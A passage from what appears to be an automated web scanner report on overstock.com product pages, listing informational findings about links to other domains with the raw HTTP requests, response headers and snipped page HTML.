<img src="http://ak2.ostkcdn.com/img/mxc/08-icon_payPal.gif" title="PapPal" />
<dd>
...[SNIP]...
pture-content/fetch?hash=GD829B8P&amp;content=/bmlweb/os_tnpupto6mnomin500rollingiw.html ','BMLPopUp','width=550,height=500,resizable=yes,menubar=yes,location=yes,status=yes,scrollbars=yes')" href="#"><img src="http://ak2.ostkcdn.com/img/mxc/08-icon_BML.gif" title="BillMeLater" /></a>
...[SNIP]...
<dl>
<img border="0" alt="" alt="Overstock.com MasterCard Card" src="http://ak2.ostkcdn.com/img/mxc/2010-CB_CreditCardIcon-med.gif"><h3 class="heading">
...[SNIP]...
</span><img src="http://ak2.ostkcdn.com/img/mxc/stars4_6.gif" alt="" />
</div>
...[SNIP]...
<p>Rating <img id="starImage1" src="http://ak2.ostkcdn.com/img/mxc/stars4_0.gif" alt="" /></p>
...[SNIP]...
<p>Rating <img id="starImage2" src="http://ak2.ostkcdn.com/img/mxc/stars4_0.gif" alt="" /></p>
...[SNIP]...
<p>Rating <img id="starImage3" src="http://ak2.ostkcdn.com/img/mxc/stars5_0.gif" alt="" /></p>
...[SNIP]...
<p>Rating <img id="starImage4" src="http://ak2.ostkcdn.com/img/mxc/stars5_0.gif" alt="" /></p>
...[SNIP]...
<p>Rating <img id="starImage5" src="http://ak2.ostkcdn.com/img/mxc/stars4_0.gif" alt="" /></p>
...[SNIP]...
<!-- id="bd" -->


<script language="JavaScript" src="http://ak2.ostkcdn.com/js/s_code.js" type='text/javascript'></script>
...[SNIP]...
<li><a href="http://www.facebook.com/Overstockdotcom" target="_blank"><i class="facebook">
...[SNIP]...
<li><a href="http://twitter.com/overstock" target="_blank"><i class="twitter">
...[SNIP]...
<li><a href="http://www.o.biz?TID=FOOT:RS:OBIZ" target="_blank">O.biz</a>
...[SNIP]...
<li><a href="http://www.eziba.com?TID=FOOT:RS:EZIBA" target="_blank">Eziba.com</a>
...[SNIP]...
<NOSCRIPT>
<IFRAME SRC="http://fls.doubleclick.net/activityi;src=1787227;type=count546;cat=produ835;u1=11440034;ord=1?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
...[SNIP]...
<!-- PERMUTO PRODUCT PAGE PIXEL -->
<script type="text/javascript"
src="http://img.pulsemgr.com/script/pm/100/">
</script>
...[SNIP]...

5.13. http://www.overstock.com/Home-Garden/Mira-8-way-Hand-tied-Paisley-Arm-Chair-and-Ottoman/3348501/product.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Mira-8-way-Hand-tied-Paisley-Arm-Chair-and-Ottoman/3348501/product.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Home-Garden/Mira-8-way-Hand-tied-Paisley-Arm-Chair-and-Ottoman/3348501/product.html?IID=prod3348501&sec_iid=74074 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:30:02 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:30:02 GMT
Pragma: no-cache
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:30:02 GMT; Path=/
Set-Cookie: ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/|mxcclickele^74074; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=3348501|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:30:02 GMT; Path=/
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 137959

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...
.org/ratingsv02.html" l gen true for "http://www.overstock.com/" r (cz 1 lz 1 nz 1 oz 1 vz 1) "http://www.rsac.org/ratingsv01.html" l gen true for "http://www.overstock.com/" r (n 0 s 0 v 0 l 0))'>

<link rel="shortcut icon" href="http://ak1.ostkcdn.com/favicon.ico">
<link rel="stylesheet" href="http://ak1.ostkcdn.com/css/os-master.1.2.2.min.css">
<!--[if IE]>
...[SNIP]...
<!--End Element SITE_HEAD_S -->


<link rel="stylesheet" type="text/css" href="http://ak1.ostkcdn.com/css/product-page.1.1.1.min.css" media="all">
<script language="JavaScript1.1" type="text/javascript" src="http://ak1.ostkcdn.com/js/ProductPageCommon.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ak1.ostkcdn.com/js/swfobject.js"></script>
<script type="text/javascript" src="http://ak1.ostkcdn.com/js/lib/os/overstock.1.5.2.min.js"></script>
...[SNIP]...
</script>
<script language='javascript' src='http://ak1.ostkcdn.com/js/sales_mtagconfig.js' type='text/javascript'> </script>


<link rel='SHORTCUT ICON' HREF='http://ak1.ostkcdn.com/favicon.ico'>


</head>
...[SNIP]...
<div class="checkOut" >
<img id="checkOutCartIcon" border="0" src="http://ak1.ostkcdn.com/img/mxc/spacer.gif">
<a id="checkoutLink" href="http://www.overstock.com/cart" rel="nofollow">
...[SNIP]...
<a href="http://www.overstock.com/cart" rel="nofollow">
<img id="checkoutButton" border="0" src="http://ak1.ostkcdn.com/img/mxc/spacer.gif" style="margin-left: 10px;">
</a>
...[SNIP]...
<a href="http://www.overstock.com/intlcountryselect"><img src="http://ak1.ostkcdn.com/img/mxc/20101020_us_flag.gif" /></a>
...[SNIP]...
</script>


<script type="text/javascript" src="http://ak1.ostkcdn.com/js/p13n.js"></script>
...[SNIP]...
<li><a href="http://www.facebook.com/sharer.php?u=[url]&t=[title]" title="Facebook" rel="facebook" target="_blank"><i class="facebook">
...[SNIP]...
<li><a href="http://twitter.com/home?status=[url]%20-%20[title]" title="Twitter" rel="twitter" target="_blank"><i class="twitter">
...[SNIP]...
<li><a href="http://www.google.com/bookmarks/mark?op=add&bkmk=[url]&title=[title]" title="Google" rel="google" target="_blank"><i class="google">
...[SNIP]...
<li><a href="http://www.myspace.com/Modules/PostTo/Pages/?u=[url]&t=[title]" title="Myspace" rel="myspace" target="_blank"><i class="myspace">
...[SNIP]...
<li><a href="https://skydrive.live.com/sharefavorite.aspx/.SharedFavorites??marklet=1&mkt=en-us&url=[url]&title=[title]" title="Live" rel="live" target="_blank"><i class="live">
...[SNIP]...
<li><a href="http://digg.com/submit?phase=2&url=[url]&amp;title=[title]" title="Digg" rel="digg" target="_blank"><i class="digg">
...[SNIP]...
<li><a href="http://del.icio.us/post?v=4&amp;noui&amp;jump=close&amp;url=[url]&title=[title]" title="Delicious" rel="delicious" target="_blank"><i class="delicious">
...[SNIP]...
<li><a href="http://reddit.com/submit?url=[url]&title=[title]" title="Reddit" rel="reddit" target="_blank"><i class="reddit">
...[SNIP]...
<li><a href="http://www.blogger.com/blog_this.pyra?u=[url]&t=[title]" title="Blogger" rel="blogger" target="_blank"><i class="blogger">
...[SNIP]...
<div id="prodMain_imgGallery" class="col6span2">
<link rel="stylesheet" type="text/css" href="http://ak1.ostkcdn.com/css/productPageImgGallery.css"/>

<!-- ZONE - ImageGallery - BEGIN -->
...[SNIP]...
<div id="galleryImage" class="noZoom">

<img style="display: block;" onclick="return viewLarger();" id="activeImage"
src="http://ak1.ostkcdn.com/images/products/P11440034.jpg"
alt="Mira 8-way Hand-tied Paisley Arm Chair and Ottoman"


width='250'

border="0"
onLoad="CheckSize(this)"
/>


</div>
...[SNIP]...
<li class="active" id="node1">

<a onclick="return viewLarger();" onmouseover="return showPicture(this, false,false)" title="Mira 8-way Hand-tied Paisley Arm Chair and Ottoman" href="http://ak2.ostkcdn.com/images/products/P11440034.jpg">
<img height='72' name="proimg" id="image" class="sizedProdImage" src="http://ak2.ostkcdn.com/images/products/P11440034.jpg" >

</a>
...[SNIP]...
<li>
<a onclick="return viewLarger();" onmouseover="return showPicture(this, false, false)" href="http://ak2.ostkcdn.com/images/products/MLA11440034.jpg" >
<img height="72" src="http://ak1.ostkcdn.com/images/products/MLA11440034.jpg" alt="Mira 8-way Hand-tied Paisley Arm Chair and Ottoman" >
</a>
...[SNIP]...
<li>
<a onclick="return viewLarger();" onmouseover="return showPicture(this, false, false)" href="http://ak1.ostkcdn.com/images/products/MLB11440034.jpg">
<img height="72" src="http://ak1.ostkcdn.com/images/products/MLB11440034.jpg" alt="Mira 8-way Hand-tied Paisley Arm Chair and Ottoman">
</a>
...[SNIP]...
<div class="flashPlayer" id="flashcontent" >
<a href="http://www.adobe.com/go/getflashplayer" target="_blank">
<img src="http://ak1.ostkcdn.com//img/mxc/get_flash_player.gif" alt="Get Adobe Flash player" />
</a>
...[SNIP]...
</span>

<img id="starImage" alt="Overall Rating" src="http://ak1.ostkcdn.com/img/mxc/stars4_6.gif">

<a id="showAllReviewsLink" title="Read Reviews" href="http://www.overstock.com/Home-Garden/Mira-8-way-Hand-tied-Paisley-Arm-Chair-and-Ottoman/3348501/customer-reviews.html">
...[SNIP]...
<dl>
<img src='http://ak1.ostkcdn.com/img/mxc/20090714_cc+logos.gif' border='0' alt=''><h3 class="heading">
...[SNIP]...
</ul>
<img src="http://ak1.ostkcdn.com/img/mxc/08-icon_payPal.gif" title="PapPal" />
<dd>
...[SNIP]...
pture-content/fetch?hash=GD829B8P&amp;content=/bmlweb/os_tnpupto6mnomin500rollingiw.html ','BMLPopUp','width=550,height=500,resizable=yes,menubar=yes,location=yes,status=yes,scrollbars=yes')" href="#"><img src="http://ak1.ostkcdn.com/img/mxc/08-icon_BML.gif" title="BillMeLater" /></a>
...[SNIP]...
<dl>
<img border="0" alt="" alt="Overstock.com MasterCard Card" src="http://ak1.ostkcdn.com/img/mxc/2010-CB_CreditCardIcon-med.gif"><h3 class="heading">
...[SNIP]...
</span><img src="http://ak1.ostkcdn.com/img/mxc/stars4_6.gif" alt="" />
</div>
...[SNIP]...
<p>Rating <img id="starImage1" src="http://ak1.ostkcdn.com/img/mxc/stars4_0.gif" alt="" /></p>
...[SNIP]...
<p>Rating <img id="starImage2" src="http://ak1.ostkcdn.com/img/mxc/stars4_0.gif" alt="" /></p>
...[SNIP]...
<p>Rating <img id="starImage3" src="http://ak1.ostkcdn.com/img/mxc/stars5_0.gif" alt="" /></p>
...[SNIP]...
<p>Rating <img id="starImage4" src="http://ak1.ostkcdn.com/img/mxc/stars5_0.gif" alt="" /></p>
...[SNIP]...
<p>Rating <img id="starImage5" src="http://ak1.ostkcdn.com/img/mxc/stars4_0.gif" alt="" /></p>
...[SNIP]...
<!-- id="bd" -->


<script language="JavaScript" src="http://ak1.ostkcdn.com/js/s_code.js" type='text/javascript'></script>
...[SNIP]...
<li><a href="http://www.facebook.com/Overstockdotcom" target="_blank"><i class="facebook">
...[SNIP]...
<li><a href="http://twitter.com/overstock" target="_blank"><i class="twitter">
...[SNIP]...
<li><a href="http://www.o.biz?TID=FOOT:RS:OBIZ" target="_blank">O.biz</a>
...[SNIP]...
<li><a href="http://www.eziba.com?TID=FOOT:RS:EZIBA" target="_blank">Eziba.com</a>
...[SNIP]...
<NOSCRIPT>
<IFRAME SRC="http://fls.doubleclick.net/activityi;src=1787227;type=count546;cat=produ835;u1=11440034;ord=1?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
...[SNIP]...
<!-- PERMUTO PRODUCT PAGE PIXEL -->
<script type="text/javascript"
src="http://img.pulsemgr.com/script/pm/100/">
</script>
...[SNIP]...

5.14. http://www.overstock.com/Home-Garden/Oval-tip-Burnt-Paisley-Arm-Chair/3867484/product.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Oval-tip-Burnt-Paisley-Arm-Chair/3867484/product.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Home-Garden/Oval-tip-Burnt-Paisley-Arm-Chair/3867484/product.html?IID=prod3867484&sec_iid=74074 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:28:57 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:28:57 GMT
Pragma: no-cache
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/|mxcclickele^74074; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:28:57 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=3867484|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:28:57 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=9
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 135092

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...
.org/ratingsv02.html" l gen true for "http://www.overstock.com/" r (cz 1 lz 1 nz 1 oz 1 vz 1) "http://www.rsac.org/ratingsv01.html" l gen true for "http://www.overstock.com/" r (n 0 s 0 v 0 l 0))'>

<link rel="shortcut icon" href="http://ak1.ostkcdn.com/favicon.ico">
<link rel="stylesheet" href="http://ak1.ostkcdn.com/css/os-master.1.2.2.min.css">
<!--[if IE]>
...[SNIP]...
<!--End Element SITE_HEAD_S -->


<link rel="stylesheet" type="text/css" href="http://ak1.ostkcdn.com/css/product-page.1.1.1.min.css" media="all">
<script language="JavaScript1.1" type="text/javascript" src="http://ak1.ostkcdn.com/js/ProductPageCommon.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ak1.ostkcdn.com/js/swfobject.js"></script>
<script type="text/javascript" src="http://ak1.ostkcdn.com/js/lib/os/overstock.1.5.2.min.js"></script>
...[SNIP]...
</script>
<script language='javascript' src='http://ak1.ostkcdn.com/js/sales_mtagconfig.js' type='text/javascript'> </script>


<link rel='SHORTCUT ICON' HREF='http://ak1.ostkcdn.com/favicon.ico'>


</head>
...[SNIP]...
<div class="checkOut" >
<img id="checkOutCartIcon" border="0" src="http://ak1.ostkcdn.com/img/mxc/spacer.gif">
<a id="checkoutLink" href="http://www.overstock.com/cart" rel="nofollow">
...[SNIP]...
<a href="http://www.overstock.com/cart" rel="nofollow">
<img id="checkoutButton" border="0" src="http://ak1.ostkcdn.com/img/mxc/spacer.gif" style="margin-left: 10px;">
</a>
...[SNIP]...
<a href="http://www.overstock.com/intlcountryselect"><img src="http://ak1.ostkcdn.com/img/mxc/20101020_us_flag.gif" /></a>
...[SNIP]...
</script>


<script type="text/javascript" src="http://ak2.ostkcdn.com/js/p13n.js"></script>
...[SNIP]...
<li><a href="http://www.facebook.com/sharer.php?u=[url]&t=[title]" title="Facebook" rel="facebook" target="_blank"><i class="facebook">
...[SNIP]...
<li><a href="http://twitter.com/home?status=[url]%20-%20[title]" title="Twitter" rel="twitter" target="_blank"><i class="twitter">
...[SNIP]...
<li><a href="http://www.google.com/bookmarks/mark?op=add&bkmk=[url]&title=[title]" title="Google" rel="google" target="_blank"><i class="google">
...[SNIP]...
<li><a href="http://www.myspace.com/Modules/PostTo/Pages/?u=[url]&t=[title]" title="Myspace" rel="myspace" target="_blank"><i class="myspace">
...[SNIP]...
<li><a href="https://skydrive.live.com/sharefavorite.aspx/.SharedFavorites??marklet=1&mkt=en-us&url=[url]&title=[title]" title="Live" rel="live" target="_blank"><i class="live">
...[SNIP]...
<li><a href="http://digg.com/submit?phase=2&url=[url]&amp;title=[title]" title="Digg" rel="digg" target="_blank"><i class="digg">
...[SNIP]...
<li><a href="http://del.icio.us/post?v=4&amp;noui&amp;jump=close&amp;url=[url]&title=[title]" title="Delicious" rel="delicious" target="_blank"><i class="delicious">
...[SNIP]...
<li><a href="http://reddit.com/submit?url=[url]&title=[title]" title="Reddit" rel="reddit" target="_blank"><i class="reddit">
...[SNIP]...
<li><a href="http://www.blogger.com/blog_this.pyra?u=[url]&t=[title]" title="Blogger" rel="blogger" target="_blank"><i class="blogger">
...[SNIP]...
<div id="prodMain_imgGallery" class="col6span2">
<link rel="stylesheet" type="text/css" href="http://ak1.ostkcdn.com/css/productPageImgGallery.css"/>

<!-- ZONE - ImageGallery - BEGIN -->
...[SNIP]...
<div id="galleryImage" class="noZoom">

<img style="display: block;" onclick="return viewLarger();" id="activeImage"
src="http://ak2.ostkcdn.com/images/products/P11917718.jpg"
alt="Oval-tip Burnt Paisley Arm Chair"


width='250'

border="0"
onLoad="CheckSize(this)"
/>


</div>
...[SNIP]...
<li class="active" id="node1">

<a onclick="return viewLarger();" onmouseover="return showPicture(this, false,false)" title="Oval-tip Burnt Paisley Arm Chair" href="http://ak2.ostkcdn.com/images/products/P11917718.jpg">
<img height='72' name="proimg" id="image" class="sizedProdImage" src="http://ak1.ostkcdn.com/images/products/P11917718.jpg" >

</a>
...[SNIP]...
<li>
<a onclick="return viewLarger();" onmouseover="return showPicture(this, false, false)" href="http://ak2.ostkcdn.com/images/products/MLA11917718.jpg" >
<img height="72" src="http://ak2.ostkcdn.com/images/products/MLA11917718.jpg" alt="Oval-tip Burnt Paisley Arm Chair" >
</a>
...[SNIP]...
<li>
<a onclick="return viewLarger();" onmouseover="return showPicture(this, false, false)" href="http://ak1.ostkcdn.com/images/products/MLB11917718.jpg">
<img height="72" src="http://ak2.ostkcdn.com/images/products/MLB11917718.jpg" alt="Oval-tip Burnt Paisley Arm Chair">
</a>
...[SNIP]...
<div class="flashPlayer" id="flashcontent" >
<a href="http://www.adobe.com/go/getflashplayer" target="_blank">
<img src="http://ak1.ostkcdn.com//img/mxc/get_flash_player.gif" alt="Get Adobe Flash player" />
</a>
...[SNIP]...
</span>

<img id="starImage" alt="Overall Rating" src="http://ak1.ostkcdn.com/img/mxc/stars4_6.gif">

<a id="showAllReviewsLink" title="Read Reviews" href="http://www.overstock.com/Home-Garden/Oval-tip-Burnt-Paisley-Arm-Chair/3867484/customer-reviews.html">
...[SNIP]...
<dl>
<img src='http://ak1.ostkcdn.com/img/mxc/20090714_cc+logos.gif' border='0' alt=''><h3 class="heading">
...[SNIP]...
</ul>
<img src="http://ak1.ostkcdn.com/img/mxc/08-icon_payPal.gif" title="PapPal" />
<dd>
...[SNIP]...
pture-content/fetch?hash=GD829B8P&amp;content=/bmlweb/os_tnpupto6mnomin500rollingiw.html ','BMLPopUp','width=550,height=500,resizable=yes,menubar=yes,location=yes,status=yes,scrollbars=yes')" href="#"><img src="http://ak1.ostkcdn.com/img/mxc/08-icon_BML.gif" title="BillMeLater" /></a>
...[SNIP]...
<dl>
<img border="0" alt="" alt="Overstock.com MasterCard Card" src="http://ak1.ostkcdn.com/img/mxc/2010-CB_CreditCardIcon-med.gif"><h3 class="heading">
...[SNIP]...
</span><img src="http://ak1.ostkcdn.com/img/mxc/stars4_6.gif" alt="" />
</div>
...[SNIP]...
<p>Rating <img id="starImage1" src="http://ak1.ostkcdn.com/img/mxc/stars5_0.gif" alt="" /></p>
...[SNIP]...
<p>Rating <img id="starImage2" src="http://ak1.ostkcdn.com/img/mxc/stars5_0.gif" alt="" /></p>
...[SNIP]...
<p>Rating <img id="starImage3" src="http://ak1.ostkcdn.com/img/mxc/stars5_0.gif" alt="" /></p>
...[SNIP]...
<p>Rating <img id="starImage4" src="http://ak1.ostkcdn.com/img/mxc/stars5_0.gif" alt="" /></p>
...[SNIP]...
<p>Rating <img id="starImage5" src="http://ak1.ostkcdn.com/img/mxc/stars4_0.gif" alt="" /></p>
...[SNIP]...
<!-- id="bd" -->


<script language="JavaScript" src="http://ak1.ostkcdn.com/js/s_code.js" type='text/javascript'></script>
...[SNIP]...
<li><a href="http://www.facebook.com/Overstockdotcom" target="_blank"><i class="facebook">
...[SNIP]...
<li><a href="http://twitter.com/overstock" target="_blank"><i class="twitter">
...[SNIP]...
<li><a href="http://www.o.biz?TID=FOOT:RS:OBIZ" target="_blank">O.biz</a>
...[SNIP]...
<li><a href="http://www.eziba.com?TID=FOOT:RS:EZIBA" target="_blank">Eziba.com</a>
...[SNIP]...
<NOSCRIPT>
<IFRAME SRC="http://fls.doubleclick.net/activityi;src=1787227;type=count546;cat=produ835;u1=11917718;ord=1?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
...[SNIP]...
<!-- PERMUTO PRODUCT PAGE PIXEL -->
<script type="text/javascript"
src="http://img.pulsemgr.com/script/pm/100/">
</script>
...[SNIP]...

5.15. http://www.overstock.com/Home-Garden/Oval-tip-Burnt-Paisley-Arm-Chair/3867484/product.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Oval-tip-Burnt-Paisley-Arm-Chair/3867484/product.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Home-Garden/Oval-tip-Burnt-Paisley-Arm-Chair/3867484/product.html?TID=R:A2_2 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:28:55 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:28:55 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=3867484|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:28:55 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:28:55 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 134985

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...
.org/ratingsv02.html" l gen true for "http://www.overstock.com/" r (cz 1 lz 1 nz 1 oz 1 vz 1) "http://www.rsac.org/ratingsv01.html" l gen true for "http://www.overstock.com/" r (n 0 s 0 v 0 l 0))'>

<link rel="shortcut icon" href="http://ak2.ostkcdn.com/favicon.ico">
<link rel="stylesheet" href="http://ak2.ostkcdn.com/css/os-master.1.2.2.min.css">
<!--[if IE]>
...[SNIP]...
<!--End Element SITE_HEAD_S -->


<link rel="stylesheet" type="text/css" href="http://ak2.ostkcdn.com/css/product-page.1.1.1.min.css" media="all">
<script language="JavaScript1.1" type="text/javascript" src="http://ak2.ostkcdn.com/js/ProductPageCommon.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ak2.ostkcdn.com/js/swfobject.js"></script>
<script type="text/javascript" src="http://ak2.ostkcdn.com/js/lib/os/overstock.1.5.2.min.js"></script>
...[SNIP]...
</script>
<script language='javascript' src='http://ak2.ostkcdn.com/js/sales_mtagconfig.js' type='text/javascript'> </script>


<link rel='SHORTCUT ICON' HREF='http://ak2.ostkcdn.com/favicon.ico'>


</head>
...[SNIP]...
<div class="checkOut" >
<img id="checkOutCartIcon" border="0" src="http://ak2.ostkcdn.com/img/mxc/spacer.gif">
<a id="checkoutLink" href="http://www.overstock.com/cart" rel="nofollow">
...[SNIP]...
<a href="http://www.overstock.com/cart" rel="nofollow">
<img id="checkoutButton" border="0" src="http://ak2.ostkcdn.com/img/mxc/spacer.gif" style="margin-left: 10px;">
</a>
...[SNIP]...
<a href="http://www.overstock.com/intlcountryselect"><img src="http://ak2.ostkcdn.com/img/mxc/20101020_us_flag.gif" /></a>
...[SNIP]...
</script>


<script type="text/javascript" src="http://ak1.ostkcdn.com/js/p13n.js"></script>
...[SNIP]...
<li><a href="http://www.facebook.com/sharer.php?u=[url]&t=[title]" title="Facebook" rel="facebook" target="_blank"><i class="facebook">
...[SNIP]...
<li><a href="http://twitter.com/home?status=[url]%20-%20[title]" title="Twitter" rel="twitter" target="_blank"><i class="twitter">
...[SNIP]...
<li><a href="http://www.google.com/bookmarks/mark?op=add&bkmk=[url]&title=[title]" title="Google" rel="google" target="_blank"><i class="google">
...[SNIP]...
<li><a href="http://www.myspace.com/Modules/PostTo/Pages/?u=[url]&t=[title]" title="Myspace" rel="myspace" target="_blank"><i class="myspace">
...[SNIP]...
<li><a href="https://skydrive.live.com/sharefavorite.aspx/.SharedFavorites??marklet=1&mkt=en-us&url=[url]&title=[title]" title="Live" rel="live" target="_blank"><i class="live">
...[SNIP]...
<li><a href="http://digg.com/submit?phase=2&url=[url]&amp;title=[title]" title="Digg" rel="digg" target="_blank"><i class="digg">
...[SNIP]...
<li><a href="http://del.icio.us/post?v=4&amp;noui&amp;jump=close&amp;url=[url]&title=[title]" title="Delicious" rel="delicious" target="_blank"><i class="delicious">
...[SNIP]...
<li><a href="http://reddit.com/submit?url=[url]&title=[title]" title="Reddit" rel="reddit" target="_blank"><i class="reddit">
...[SNIP]...
<li><a href="http://www.blogger.com/blog_this.pyra?u=[url]&t=[title]" title="Blogger" rel="blogger" target="_blank"><i class="blogger">
...[SNIP]...
<div id="prodMain_imgGallery" class="col6span2">
<link rel="stylesheet" type="text/css" href="http://ak2.ostkcdn.com/css/productPageImgGallery.css"/>

<!-- ZONE - ImageGallery - BEGIN -->
...[SNIP]...
<div id="galleryImage" class="noZoom">

<img style="display: block;" onclick="return viewLarger();" id="activeImage"
